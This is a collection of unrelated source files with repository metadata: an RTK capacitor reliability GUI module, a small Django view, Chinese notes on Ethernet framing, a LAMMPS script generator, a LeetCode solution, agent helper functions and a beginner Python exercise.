self._subcategory == 52: # Non-solid tantalum self._lst_construction = ["", _(u"Slug, All Tantalum"), _(u"Foil, Hermetic"), _(u"Slug, Hermetic"), _(u"Foil, Non-Hermetic"), _(u"Slug, Non-Hermetic")] self._lst_stress_labels.append(_(u"Construction:")) elif self._subcategory == 58: # Variable vacuum self._lst_configuration = ["", _(u"Fixed"), _(u"Variable")] self._lst_stress_labels.append(_(u"Configuration:")) # Create the tooltips for all the input widgets. self.cmbConfiguration.set_tooltip_text(_(u"Displays whether the " u"selected capacitor is " u"fixed or variable.")) self.cmbConstruction.set_tooltip_text(_(u"Displays the method of " u"construction for the " u"selected capacitor.")) self.cmbQuality.set_tooltip_text(_(u"Select and display the quality " u"level for the selected " u"capacitor.")) self.cmbSpecification.set_tooltip_text(_(u"Selects the governing " u"specification for the " u"selected capacitor.")) self.cmbSpecSheet.set_tooltip_text(_(u"Selects the maximum " u"temperature rating for the " u"selected capacitor.")) self.txtACVoltApplied.set_tooltip_text(_(u"Displays the peak " u"operating AC voltage for " u"the selected capacitor.")) self.txtCapacitance.set_tooltip_text(_(u"Display the capacitance in " u"farads for the selected " u"capacitor.")) self.txtCommercialPiQ.set_tooltip_text(_(u"Displays the user-defined " u"quality factor for the " u"selected capacitor. This " u"value over rides the " u"quality factor selected " u"above.")) self.txtEffResistance.set_tooltip_text(_(u"Displays the effective " u"series resistance between " u"the power supply and the " u"capacitor.")) self.txtVoltRated.set_tooltip_text(_(u"Displays the rated voltage for " u"the selected capacitor.")) self.txtVoltApplied.set_tooltip_text(_(u"Display the operating DC " u"voltage for the selected " u"capacitor.")) # Connect signals to callback functions. self._lst_handler_id.append( self.cmbQuality.connect('changed', self._on_combo_changed, 0)) self._lst_handler_id.append( self.txtCommercialPiQ.connect('focus-out-event', self._on_focus_out, 1)) self._lst_handler_id.append( self.txtVoltRated.connect('focus-out-event', self._on_focus_out, 2)) self._lst_handler_id.append( self.txtVoltApplied.connect('focus-out-event', self._on_focus_out, 3)) self._lst_handler_id.append( self.txtACVoltApplied.connect('focus-out-event', self._on_focus_out, 4)) self._lst_handler_id.append( self.txtCapacitance.connect('focus-out-event', self._on_focus_out, 5)) self._lst_handler_id.append( self.cmbSpecification.connect('changed', self._on_combo_changed, 6)) self._lst_handler_id.append( self.cmbSpecSheet.connect('changed', self._on_combo_changed, 7)) self._lst_handler_id.append( self.txtEffResistance.connect('focus-out-event', self._on_focus_out, 8)) self._lst_handler_id.append( self.cmbConstruction.connect('changed', self._on_combo_changed, 9)) self._lst_handler_id.append( self.cmbConfiguration.connect('changed', self._on_combo_changed, 10)) def create_217_count_inputs(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 parts count input widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: False if successful or True if an error is encountered. :rtype: bool """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Parts Count Inputs") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Populate all the gtk.ComboBox(). for i in range(len(self._lst_quality)): self.cmbQuality.insert_text(i, self._lst_quality[i]) for i in range(len(self._lst_specification)): self.cmbSpecification.insert_text(i, self._lst_specification[i]) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_count_labels, _fixed, 5, 5) _x_pos = max(x_pos, _x_pos) + 50 # Place all the input widgets. if self.cmbQuality.get_parent() is not None: self.cmbQuality.reparent(_fixed) if self.cmbSpecification.get_parent() is not None: self.cmbSpecification.reparent(_fixed) _fixed.put(self.cmbQuality, _x_pos, _y_pos[0]) _fixed.put(self.cmbSpecification, _x_pos, _y_pos[1]) _fixed.show_all() return _x_pos def create_217_stress_inputs(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 part stress input widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: False if successful or True if an error is encountered. :rtype: bool """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Part Stress Inputs") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Populate all the gtk.ComboBox(). for i in range(len(self._lst_quality)): self.cmbQuality.insert_text(i, self._lst_quality[i]) for i in range(len(self._lst_specification)): self.cmbSpecification.insert_text(i, self._lst_specification[i]) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_stress_labels, _fixed, 5, 5) _x_pos = max(x_pos, _x_pos) + 50 # Place all the input widgets. if self.cmbQuality.get_parent is not None: self.cmbQuality.reparent(_fixed) if self.cmbSpecification.get_parent is not None: self.cmbSpecification.reparent(_fixed) _fixed.put(self.cmbQuality, _x_pos, _y_pos[0]) _fixed.put(self.txtCommercialPiQ, _x_pos, _y_pos[1]) _fixed.put(self.txtVoltRated, _x_pos, _y_pos[2]) _fixed.put(self.txtVoltApplied, _x_pos, _y_pos[3]) _fixed.put(self.txtACVoltApplied, _x_pos, _y_pos[4]) _fixed.put(self.txtCapacitance, _x_pos, _y_pos[5]) _fixed.put(self.cmbSpecification, _x_pos, _y_pos[6]) _fixed.put(self.cmbSpecSheet, _x_pos, _y_pos[7]) if self._subcategory == 51: # Solid tantalum _fixed.put(self.txtEffResistance, _x_pos, _y_pos[8]) elif self._subcategory == 52: # Non-solid tantalum for i in range(len(self._lst_construction)): self.cmbConstruction.insert_text(i, self._lst_construction[i]) _fixed.put(self.cmbConstruction, _x_pos, _y_pos[8]) elif self._subcategory == 58: # Gas or vacuum for i in range(len(self._lst_configuration)): self.cmbConfiguration.insert_text(i, self._lst_configuration[i]) _fixed.put(self.cmbConfiguration, _x_pos, _y_pos[8]) _fixed.show_all() return _x_pos def load_217_count_inputs(self, model): """ Method to load the Capacitor class gtk.Widgets() with MIL-HDBK-217FN2 parts count calculation inputs. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ self.cmbQuality.set_active(int(model.quality)) self.cmbSpecification.set_active(int(model.specification)) return False def load_217_stress_inputs(self, model): """ Method to load the Capacitor class gtk.Widgets() with MIL-HDBK-217FN2 part stress calculation inputs. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ fmt = '{0:0.' + str(Configuration.PLACES) + 'G}' self.cmbQuality.set_active(int(model.quality)) self.txtCommercialPiQ.set_text(str(fmt.format(model.q_override))) self.txtVoltRated.set_text(str(fmt.format(model.rated_voltage))) self.txtVoltApplied.set_text(str(fmt.format(model.operating_voltage))) self.txtACVoltApplied.set_text(str(fmt.format(model.acvapplied))) self.txtCapacitance.set_text(str('{0:0.8G}'.format(model.capacitance))) # Load subcategory specific widgets. if self._subcategory in [40, 41, 42, 43, 46, 47, 48, 49, 50, 52, 53, 54, 55, 56, 57, 58]: self.cmbSpecification.set_active(int(model.specification)) if self._subcategory in [40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 52, 53, 54, 55, 56, 57, 58]: self.cmbSpecSheet.set_active(int(model.spec_sheet)) if self._subcategory == 51: self.txtEffResistance.set_text( str(fmt.format(model.effective_resistance))) if self._subcategory == 52: self.cmbConstruction.set_active(int(model.construction)) if self._subcategory == 58: self.cmbConfiguration.set_active(int(model.configuration)) return False def _on_combo_changed(self, combo, index): """ Method to respond to gtk.ComboBox() changed signals and calls the correct function or method, passing any parameters as needed. :param gtk.ComboBox combo: the gtk.ComboBox() that called this method. :param int index: the index in the handler ID list oc the callback signal associated with the gtk.ComboBox() that called this method. :return: False if successful or True is an error is encountered. :rtype: bool """ combo.handler_block(self._lst_handler_id[index]) if index == 0: self._hardware_model.quality = combo.get_active() elif index == 6: self._hardware_model.specification = combo.get_active() self._load_spec_sheet(self._hardware_model.specification - 1) elif index == 7: self._hardware_model.spec_sheet = combo.get_active() try: self._hardware_model.reference_temperature = \ self._hardware_model.lst_ref_temp[combo.get_active() - 1] except IndexError: print self._hardware_model.name, self._hardware_model.lst_ref_temp elif index == 9: self._hardware_model.construction = combo.get_active() elif index == 10: self._hardware_model.configuration = combo.get_active() combo.handler_unblock(self._lst_handler_id[index]) return False def _on_focus_out(self, entry, __event, index): """ Method to respond to gtk.Entry() focus_out signals and calls the correct function or method, passing any parameters as needed. :param gtk.Entry entry: the gtk.Entry() that called this method. :param gtk.gdk.Event __event: the gtk.gdk.Event() that called this method. :param int index: the index in the handler ID list of the callback signal associated with the gtk.Entry() that called this method. :return: False if successful or True is an error is encountered. :rtype: bool """ entry.handler_block(self._lst_handler_id[index]) if index == 1: self._hardware_model.q_override = float(entry.get_text()) elif index == 2: self._hardware_model.rated_voltage = float(entry.get_text()) elif index == 3: self._hardware_model.operating_voltage = float(entry.get_text()) elif index == 4: self._hardware_model.acvapplied = float(entry.get_text()) elif index == 5: self._hardware_model.capacitance = float(entry.get_text()) elif index == 8: self._hardware_model.effective_resistance = float(entry.get_text()) entry.handler_unblock(self._lst_handler_id[index]) return False def _load_spec_sheet(self, specification): """ Method to load the specification sheet gtk.ComboBox() whenever a new specification is selected. :param int specification: the selected specification index. :return: False if successful or True if an error is encountered. :rtype: bool """ # Remove existing entries. _model = self.cmbSpecSheet.get_model() _model.clear() # Load the new entries. _n_spec_sheets = len(self._lst_specsheet[specification]) for i in range(_n_spec_sheets): self.cmbSpecSheet.insert_text( i, self._lst_specsheet[specification][i]) return False class Results(gtk.Frame): """ The Work Book view for displaying all the output attributes for a capacitor. The output attributes of a capacitor Work Book view are: """ def __init__(self, model): """ Method to initialize an instance of the Capacitor assessment results view. :param int subcategory: the Capacitor subcategory ID of the component to create the view for. :return: False if successful or True if an error is encountered. :rtype: bool """ gtk.Frame.__init__(self) # Define private dictionary attributes. # Define private list attributes. self._lst_count_labels = [u"<span foreground=\"blue\">\u03BB<sub>EQUIP</sub> = \u03BB<sub>g</sub>\u03C0<sub>Q</sub></span>", u"\u03BB<sub>g</sub>:", u"\u03C0<sub>Q</sub>:"] self._lst_stress_labels = ['', u"\u03BB<sub>b</sub>:", u"\u03C0<sub>Q</sub>:", u"\u03C0<sub>E</sub>:", u"\u03C0<sub>CV</sub>:"] # Define private scalar attributes. self._hardware_model = model self._subcategory = model.subcategory # Define public dictionary attributes. # Define public list attributes. # Define public scalar attributes. self.txtLambdaB = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiQ = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiE = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiCV = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiSR = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiC = Widgets.make_entry(width=100, editable=False, bold=True) self.txtPiCF = Widgets.make_entry(width=100, editable=False, bold=True) self.figDerate = Figure(figsize=(6, 4)) self.axsDerate = self.figDerate.add_subplot(111) self.pltDerate = FigureCanvas(self.figDerate) # Subcategory specific attributes. if self._subcategory in [40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 53, 54]: self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CV</sub></span>" elif self._subcategory == 51: # Solid tantalum self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CV</sub>\u03C0<sub>SR</sub></span>" self._lst_stress_labels.append(u"\u03C0<sub>SR</sub>:") elif self._subcategory == 52: # Non-solid tantalum self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CV</sub>\u03C0<sub>C</sub></span>" self._lst_stress_labels.append(u"\u03C0<sub>C</sub>:") elif self._subcategory in [55, 56, 57]: self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub></span>" self._lst_stress_labels.pop(4) elif self._subcategory == 58: self._lst_stress_labels[0] = u"<span foreground=\"blue\">\u03BB<sub>p</sub> = \u03BB<sub>b</sub>\u03C0<sub>Q</sub>\u03C0<sub>E</sub>\u03C0<sub>CF</sub></span>" self._lst_stress_labels[4] = u"\u03C0<sub>CF</sub>:" # Create the tooltips for all the results widgets. self.txtPiQ.set_tooltip_text(_(u"Displays the quality factor for the " u"selected capacitor.")) self.txtPiQ.set_tooltip_text(_(u"Displays the quality factor for the " u"selected capacitor.")) self.txtPiE.set_tooltip_text(_(u"Displays the environement factor for " u"the selected capacitor.")) self.txtPiCV.set_tooltip_text(_(u"Displays the capacitance correction " u"factor for the selected capacitor.")) self.txtPiSR.set_tooltip_text(_(u"Displays the effective series " u"resistance factor for the selected " u"capacitor.")) self.txtPiC.set_tooltip_text(_(u"Displays the construction factor " u"for the selected capacitor.")) self.txtPiCF.set_tooltip_text(_(u"Displays the configuration factor " u"for the selected capacitor.")) def create_217_count_results(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 parts count result widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: _x_pos: the x-coordinate of the widgets. :rtype: int """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Parts Count Results") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_count_labels, _fixed, 5, 25) _x_pos = max(x_pos, _x_pos) + 25 # Create the tooltips for all the results display widgets. self.txtLambdaB.set_tooltip_text(_(u"Displays the generic hazard rate " u"for the selected capacitor.")) # Place the reliability result display widgets. if self.txtLambdaB.get_parent() is not None: self.txtLambdaB.reparent(_fixed) if self.txtPiQ.get_parent() is not None: self.txtPiQ.reparent(_fixed) _fixed.put(self.txtLambdaB, _x_pos, _y_pos[1]) _fixed.put(self.txtPiQ, _x_pos, _y_pos[2]) _fixed.show_all() return _x_pos def create_217_stress_results(self, x_pos=5): """ Method to create the MIL-HDBK-217FN2 part stress result widgets for Capacitors. :keyword int x_pos: the x position of the display widgets. :return: _x_pos: the x-coordinate of the widgets. :rtype: int """ _label = gtk.Label() _label.set_markup("<span weight='bold'>" + _(u"MIL-HDBK-217FN2 Part Stress Results") + "</span>") _label.set_justify(gtk.JUSTIFY_LEFT) _label.set_alignment(xalign=0.5, yalign=0.5) _label.show_all() self.set_label_widget(_label) _fixed = gtk.Fixed() _scrollwindow = gtk.ScrolledWindow() _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) _scrollwindow.add_with_viewport(_fixed) self.add(_scrollwindow) # Create and place all the labels for the inputs. (_x_pos, _y_pos) = Widgets.make_labels(self._lst_stress_labels, _fixed, 5, 25) _x_pos = max(x_pos, _x_pos) + 25 # Create the tooltips for all the results display widgets. self.txtLambdaB.set_tooltip_text(_(u"Displays the base hazard rate " u"for the selected capacitor.")) # Place the reliability result display widgets. if self.txtLambdaB.get_parent() is not None: self.txtLambdaB.reparent(_fixed) if self.txtPiQ.get_parent() is not None: self.txtPiQ.reparent(_fixed) _fixed.put(self.txtLambdaB, _x_pos, _y_pos[1]) _fixed.put(self.txtPiQ, _x_pos, _y_pos[2]) _fixed.put(self.txtPiE, _x_pos, _y_pos[3]) # Subcategory specific widgets. if self._subcategory == 51: _fixed.put(self.txtPiSR, _x_pos, _y_pos[5]) elif self._subcategory == 52: _fixed.put(self.txtPiC, _x_pos, _y_pos[5]) elif self._subcategory not in [55, 56, 57, 58]: # Not variable _fixed.put(self.txtPiCV, _x_pos, _y_pos[4]) if self._subcategory == 58: _fixed.put(self.txtPiCF, _x_pos, _y_pos[4]) _fixed.show_all() return _x_pos def load_217_count_results(self, model): """ Method to load the Capacitor class MIL-HDBK-217 parts count result gtk.Widgets(). :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ fmt = '{0:0.' + str(Configuration.PLACES) + 'G}' self.txtLambdaB.set_text(str(fmt.format(model.base_hr))) self.txtPiQ.set_text(str(fmt.format(model.piQ))) return False def load_217_stress_results(self, model): """ Method to load the Capacitor class MIL-HDBK-217 part stress result gtk.Widgets(). :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the attributes from. :return: False if successful or True if an error is encountered. :rtype: bool """ fmt = '{0:0.' + str(Configuration.PLACES) + 'G}' self.txtLambdaB.set_text(str(fmt.format(model.base_hr))) self.txtPiQ.set_text(str(fmt.format(model.piQ))) self.txtPiE.set_text(str(fmt.format(model.piE))) self.txtPiCV.set_text(str(fmt.format(model.piCV))) if self._subcategory == 51: self.txtPiSR.set_text(str(fmt.format(model.piSR))) elif self._subcategory == 52: self.txtPiC.set_text(str(fmt.format(model.piC))) elif self._subcategory == 58: self.txtPiCF.set_text(str(fmt.format(model.piCF))) return False def load_derate_plot(self, model, frame): """ Method to load the stress derate plot for the Capacitor class. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` to load the plot for. :param gtk.Frame frame: the gtk.Frame() to embed the derate plot into. :return: False if successful or True if an error is encountered. :rtype: bool """ # Clear the operating point and derating curve for the component. We # do this here so the component-specific GUI will set the proper x and # y-axis labels. self.axsDerate.cla() # Plot the derating curve and operating point. _x = [float(model.min_rated_temperature), float(model.knee_temperature), float(model.max_rated_temperature)] self.axsDerate.plot(_x, model.lst_derate_criteria[0], 'r.-', linewidth=2) self.axsDerate.plot(_x, model.lst_derate_criteria[1], 'b.-', linewidth=2) self.axsDerate.plot(model.temperature_active, model.voltage_ratio, 'go') if(_x[0] != _x[2] and model.lst_derate_criteria[1][0] != model.lst_derate_criteria[1][2]): self.axsDerate.axis([0.95 * _x[0], 1.05 * _x[2], model.lst_derate_criteria[1][2], 1.05 * model.lst_derate_criteria[1][0]]) else: self.axsDerate.axis([0.95, 1.05, 0.0, 1.05]) self.axsDerate.set_title(_(u"Voltage Derating Curve for %s at %s") % (model.part_number, model.ref_des), fontdict={'fontsize': 12, 'fontweight': 'bold', 'verticalalignment': 'baseline'}) _legend = tuple([_(u"Harsh Environment"), _(u"Mild Environment"), _(u"Voltage Operating Point")]) _leg = self.axsDerate.legend(_legend, loc='upper right', shadow=True) for _text in _leg.get_texts(): _text.set_fontsize('small') # Set the proper labels on the derating curve. self.axsDerate.set_xlabel(_(u"Temperature (\u2070C)"), fontdict={'fontsize': 12, 'fontweight': 'bold'}) self.axsDerate.set_ylabel(r'$\mathbf{V_{op} / V_{rated}}$', fontdict={'fontsize': 12, 'fontweight': 'bold', 'rotation': 'vertical', 'verticalalignment': 'baseline'}) self.figDerate.tight_layout() frame.add(self.pltDerate) frame.show_all() return False
c3016ff7a972f62e2906adc7b0164ee77a5a2a1c
ebfac951b49ba380d4b88e0c6308aea326597381
/chatrender/views/chat_types.py
7b37509617634b9ce6f0f47cc6e770b11a026be2
[ "MIT" ]
permissive
The-Politico/django-politico-slackchat-renderer
2e4175359a4df004526722a190040cef767837fd
adb3ed2ba5039a97ee7b021d39aa40cab11e5661
refs/heads/master
2022-12-10T10:57:51.796473
2018-05-22T15:37:57
2018-05-22T15:37:57
120,328,521
2
0
MIT
2022-12-08T02:09:33
2018-02-05T16:10:25
JavaScript
UTF-8
Python
false
false
431
py
import requests from chatrender.conf import settings from django.contrib.admin.views.decorators import staff_member_required from django.shortcuts import render @staff_member_required def chat_types(request): response = requests.get(settings.SLACKCHAT_CHATTYPE_ENDPOINT) context = response.json() return render( request, 'chatrender/chattype_list.html', context={"chat_types": context} )
9d48aa9c700b4a07e4a8f8bcbda6c8fb2120b598
bad08ce4b707f8d479a6f9d6562f90d397042df7
/Python/python-socket-网络协议.py
eb95bcb6957946195c1044ca5c82f8d396114488
[]
no_license
lengyue1024/notes
93bf4ec614cbde69341bc7e4decad169a608ff39
549358063da05057654811a352ae408e48498f25
refs/heads/master
2020-04-29T07:14:45.482919
2019-03-16T07:51:26
2019-03-16T07:51:26
175,945,339
2
0
null
2019-03-16T08:19:53
2019-03-16T08:19:52
null
GB18030
Python
false
false
2,273
py
---------------------------- 网络协议入门 | ---------------------------- ---------------------------- 网络-物理层和链路层 | ---------------------------- * 以太网协议(ethernet) * 一组电信号组成一个数据包,叫做 - 帧 * 每一帧分为:报头(head)和数据(data)两部分 ——————————————————————————————— |head| data | ——————————————————————————————— * head(固定18个字节) * 发送者/源地址 :6个字节 * 接收者/目标地址 :6个字节 * 数据类型 :6个字节 * data(最短64字节,最长1500字节) * 数据包的具体内容 * head + data 最大长度就是 1518字节 (1500 +18),超过长度,就分片发送 * mac地址 * head 中包含的源地址和目标地址的由来. * ethernet 规定,接入internet的设备,都必须要具备网卡,发送端和接收端的地址,就是指网卡地址,也就是mac地址 * 每块网卡出厂时,都被烧录了世界上唯一的mac地址,长度为 48 位 2进制,通常由 12 位 16进制 表示 00:16:3e:16:0b:5e * 前面6位是厂商编号 * 后面6位是流水号 * 广播 * 有了mac地址,同一个网络内的两台主机就可以通信了(一台主机通过arp协议获取另一台主机的mac地址) * ethernet 采用最原始的方式 - 广播,方式进行通信,通俗点.计算机通信基本靠吼 IEEE802.1Q ——————————————————————————————————————————————————————————————————————————— |目标mac地址 |发送源mac地址 |TDIP |TCI |类型 |数据部分 |CRC | ——————————————————————————————————————————————————————————————————————————— 目标mac地址 :6字节 发送源mac地址 :6字节 TDIP :0x8100 TCI :内含12个bit的vlan标识 类型 :2字节 数据部分 :46 - 1500 字节 CRC :4字节,经过重新计算
1f459741a34f6b06e0c9856c6a59f86fee6acd63
a3cdfaf2d4d72f4d1c8bd2a9d3e8ce1f6d0316ca
/Research Files/10x10x10_moving/10x10x10movinglammpsscriptgenerator.py
e24983c5d7ba1cc8fa3588b9ef5309dd69d9177a
[]
no_license
webclinic017/Personal-Projects
d61e3f5ad1e1c12c611ae088fa64050dc2f4693b
4e730e350e5698bb40bbdb1526596c6a8a3c5596
refs/heads/master
2023-06-10T23:00:50.948934
2021-07-03T00:46:19
2021-07-03T00:46:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,014
py
#!/usr/bin/env python if __name__ == '__main__': temperature = 50 for i in range(1,21): temp = int(temperature) * i if temp == 1000: temp_string = "99_1000" else: temp_string = str(temp) f = open("10x10x10_{}k_moving_py.lmp".format(temp_string), "w+") f.write("# bcc iron in a 3d periodic box\n\n") f.write("clear\n") f.write("units metal\n") f.write("atom_style spin\n\n") f.write("dimension 3\n") f.write("boundary p p p\n\n") f.write("# necessary for the serial algorithm (sametag)\n") f.write("atom_modify map array \n\n") f.write("lattice bcc 2.8665\n") f.write("region box block 0.0 10.0 0.0 10.0 0.0 10.0\n") f.write("create_box 1 box\n") f.write("create_atoms 1 box\n\n") f.write("# setting mass, mag. moments, and interactions for bcc iron\n\n") f.write("mass 1 55.845\n\n") f.write("# set group all spin/random 31 2.2\n") f.write("set group all spin 2.2 0.0 0.0 1.0\n") f.write("pair_style hybrid/overlay eam/alloy spin/exchange 3.5\n") f.write("pair_coeff * * eam/alloy Fe_Mishin2006.eam.alloy Fe\n") f.write("pair_coeff * * spin/exchange exchange 3.4 0.02726 0.2171 1.841\n\n") f.write("neighbor 0.1 bin\n") f.write("neigh_modify every 10 check yes delay 20\n\n") f.write("fix 1 all precession/spin zeeman 0.0 0.0 0.0 1.0\n") f.write("fix_modify 1 energy yes\n") f.write("fix 2 all langevin/spin {}.0 0.01 21\n\n".format(int(temp))) f.write("fix 3 all nve/spin lattice moving\n") f.write("timestep 0.0001\n\n") f.write("# compute and output options\n\n") f.write("compute out_mag all spin\n") f.write("compute out_pe all pe\n") f.write("compute out_ke all ke\n") f.write("compute out_temp all temp\n\n") f.write("variable magz equal c_out_mag[3]\n") f.write("variable magnorm equal c_out_mag[4]\n") f.write("variable emag equal c_out_mag[5]\n") f.write("variable tmag equal c_out_mag[6]\n\n") f.write("thermo_style custom step time v_magnorm v_tmag temp v_emag ke pe press etotal\n") f.write("thermo 5000\n\n") f.write("compute outsp all property/atom spx spy spz sp fmx fmy fmz\n") f.write("dump 1 all custom 100 dump_iron.lammpstrj type x y z c_outsp[1] c_outsp[2] c_outsp[3]\n\n") f.write("run 100000\n") f.write("# run 2\n\n") f.write("unfix 3\n") f.write("fix 3 all nve/spin lattice moving\n") f.write("velocity all create {} 4928459 rot yes dist gaussian\n\n".format(int(temp))) f.write("run 100000") f.close()
6f97e11be404d475c96c2f5c4625ac4c0a5f12cb
bfe6c95fa8a2aae3c3998bd59555583fed72900a
/lengthOfLIS.py
0416711c4a259c5b75a686e99c23b0c224139c4f
[]
no_license
zzz136454872/leetcode
f9534016388a1ba010599f4771c08a55748694b2
b5ea6c21bff317884bdb3d7e873aa159b8c30215
refs/heads/master
2023-09-01T17:26:57.624117
2023-08-29T03:18:56
2023-08-29T03:18:56
240,464,565
0
0
null
null
null
null
UTF-8
Python
false
false
991
py
# one solution # class Solution: # def lengthOfLIS(self, nums): # log=[0 for i in range(len(nums))] # for i in range(len(nums)): # m=0 # for j in range(i): # if nums[j]<nums[i]: # m=max(m,log[j]) # log[i]=m+1 # return max(log) # # another solution class Solution: def lengthOfLIS(self, nums): if len(nums) == 0: return 0 log = [] for num in nums: if len(log) == 0 or num > log[-1]: log.append(num) continue start = 0 end = len(log) - 1 while start <= end: mid = (start + end) // 2 if log[mid] >= num: end = mid - 1 else: start = mid + 1 log[start] = num return len(log) sl = Solution() nums = [10, 9, 2, 5, 3, 7, 101, 18] print(sl.lengthOfLIS(nums))
82d5072c95d430143fba75124b748cf8add70456
d342898f0a632b28d5c6f594208300c546cb51e3
/Helper.py
ee73a7910b6b3f420a71ca6c2bdb1f2d9ec9298c
[]
no_license
DragonKiller952/ST-Groep-8
91ce869b1905504e65d84acf104fc68156d0ef91
00c19288b2fb5a6110fba6a2eea7b03650d0e534
refs/heads/main
2023-01-31T22:08:12.134684
2020-12-17T09:05:02
2020-12-17T09:05:02
318,191,516
0
0
null
null
null
null
UTF-8
Python
false
false
612
py
# Chosing blue def standard_color(*args): return 'blue' # Chosing random without duplicates def unique_random(self, choices, used): choice = self.random.choice(choices) while choice in used: choice = self.random.choice(choices) used.append(choice) return choice # Chosing color based on agent id def id_color(self, choices, used): return choices[self.agentId] # Chosing position based on agent id def id_coord(self, choices, used): coords = [(12, 75), (30, 60), (40, 80), (40, 90), (60, 80), (50, 35), (60, 35), (65, 15), (75, 40), (90, 45)] return coords[self.agentId]
09fb11f511d0b05365e34eecb467462c7c0d96a0
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/97/usersdata/228/56191/submittedfiles/lecker.py
8478e84811202758aba6f53520c3def648a83ece
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
838
py
# -*- coding: utf-8 -*- from __future__ import division n=int(input('digite o número de elementos:')) lista1=[] lista2=[] for i in range (0,n,1): termo1=int(input('digite o termo:')) lista1.append(termo1) for i in range (0,n,1): termo2=int(input('digite o termo:')) lista2.append(termo2) def leker(a): cont=0 if lista[0]>lista[1]: cont=cont+1 elif lista[n]>lista[n-1]: cont=cont+1 else: for i in range(lista[1],len(lista),1): if lista[i-1]<lista[i]<lista[i+1]: cont=cont+1 if cont==1: return True else: return False if leker(lista1): print('S') elif leker(lista1)==False: print('N') if leker(lista2): print('S') elif leker(lista2)==False: print('N')
440db3f7231af9543565979f36d3760abc278062
5f1afd8240ce286b0a78f61b7faa3a53e4d170e1
/examples/contrib/mnist/mnist_with_neptune_logger.py
2f7c7d2bc0784994e1fff9e02cd16acff0e25d91
[ "BSD-3-Clause" ]
permissive
dnola/ignite
b71e5fe7c57fe157c09044d534321b070ec4c844
da86f6d83268cba0275a18be506a69f142157e97
refs/heads/master
2020-12-29T08:47:24.519519
2020-02-07T14:30:29
2020-02-07T14:30:29
238,542,050
0
0
BSD-3-Clause
2020-02-05T20:29:07
2020-02-05T20:29:06
null
UTF-8
Python
false
false
6,778
py
